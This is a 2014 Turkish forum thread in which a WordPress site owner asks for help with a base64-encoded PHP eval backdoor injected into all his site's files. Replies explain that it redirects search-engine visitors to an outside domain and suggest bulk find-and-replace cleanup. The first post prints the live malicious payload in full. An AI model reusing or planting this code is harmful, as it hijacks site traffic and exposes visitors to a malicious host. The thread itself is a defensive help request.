• 05-02-2014, 18:34:02
    #1
    Üyeliği durduruldu
    Arkadaşlar ; her php kodunun arasına

    eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJH FhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsK JHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdW FnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1 YWcpIHsKaWYgKHN0cmlzdHIoJHVhZywiTVNJRSIpKXsKcHJlZ1 9tYXRjaCAoIi9tc2llIChbMC05Ll0rKS9pIiwkdWFnLCRtdik7 CmlmIChpc3NldCgkbXZbMV0pKXsKJG12PXN0cl9yZXBsYWNlKC IuIiwiIiwkbXZbMV0pOwp9Cn0KaWYoIXByZWdfbWF0Y2goIi9e NjZcLjI0OVwuLyIsJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10pKX sKaWYgKHN0cmlzdHIoJHVhZywiTVNJRSIpIGFuZCAkbXY+PTkw KXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vLiIpIG9yIH N0cmlzdHIoJHJlZmVyZXIsImJpbmcuIikgb3IgcHJlZ19tYXRj aCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZX IpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBh bmQgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikgYW5kICFzdH Jpc3RyKCRyZWZlcmVyLCJFZVlwM0Q3IikpewpoZWFkZXIoIkxv Y2F0aW9uOiBodHRwOi8vZ3NibmNtLmVwYWMudG8vIik7CmV4aX QoKTsKfQp9Cn0KfQp9Cn0="));

    Bu kodu eklemişler.

    Ne yapmaya çalışmışlar anlamadım.

    sitedeki tüm kodların arasında var bu.

    Site altyapısı : wordpress

    Tek tek silmek çok uzun sürecek gibi her php sayfasında onlarca var bundan.
    Seri olarak nasıl silebilir.


    Güncelleme ;


    tema w.arez değil , özel tasarım.

    Ftp programıda fillezila

    Dün bilgisayarı formatladım , şifreleri değiştirdim.

    Bu gün yine kodlar eklenmiş
  • 05-02-2014, 18:36:35
    #2
    grepwin kullanarak text to text replace yapabilirsin hocam, aklıma gelen sadece bu.
  • 05-02-2014, 18:39:07
    #3
    hepsinde aynı kod varsa notepad++ ta ctrl + h yardımı ile tümünü tek seferde değiştirebilirsiniz.
  • 05-02-2014, 18:39:34
    #4
    iframe virüsü yemişsin.
  • 05-02-2014, 18:40:22
    #5
    http referer kodu eklemişler arama motoru hitleri yönlendirilmiş
  • 05-02-2014, 18:41:47
    #6
    Üyeliği durduruldu
    LG700 adlı üyeden alıntı: mesajı görüntüle
    http referer kodu eklemişler arama motoru hitleri yönlendirilmiş
    nasıl yani üstadım ? biraz açıklarmısınız
  • 05-02-2014, 18:45:09
    #7
    Cavro adlı üyeden alıntı: mesajı görüntüle
    nasıl yani üstadım ? biraz açıklarmısınız
    kodları temizlemesen arama motorundan gelen hitler http://gsbncm.epac.to bu siteye gider

    siteye sadece arama motoru harici yerlerden gelenler yada direk gelenler ulaşabilir
  • 05-02-2014, 18:47:52
    #8
    Üyeliği durduruldu
    LG700 adlı üyeden alıntı: mesajı görüntüle
    kodları temizlemesen arama motorundan gelen hitler http://gsbncm.epac.to bu siteye gider

    siteye sadece arama motoru harici yerlerden gelenler yada direk gelenler ulaşabilir
    Bilgi verdiğiniz için çok teşekkür ederim.

    Peki açığın nereden olduğu hakkında bilginiz var mı ? ilk defa bu gibi bir şey başıma geldi. ( hacklenen site imzamda ki adres )
  • 05-02-2014, 18:50:47
    #9
    Cavro adlı üyeden alıntı: mesajı görüntüle
    Bilgi verdiğiniz için çok teşekkür ederim.

    Peki açığın nereden olduğu hakkında bilginiz var mı ? ilk defa bu gibi bir şey başıma geldi. ( hacklenen site imzamda ki adres )
    bir çok nedeni olabilir, kullandığın ftp programı warez ise bundan olur, pc de virüs vardır kayıtlı ftp bilgilerinden otomatik giriş yaparak erişim sağlanır kod ekler, kullandığın eklentilerde açık varsa ondan olur tema warezse bundan da olur daha bir çok nedeni olabilir kısacası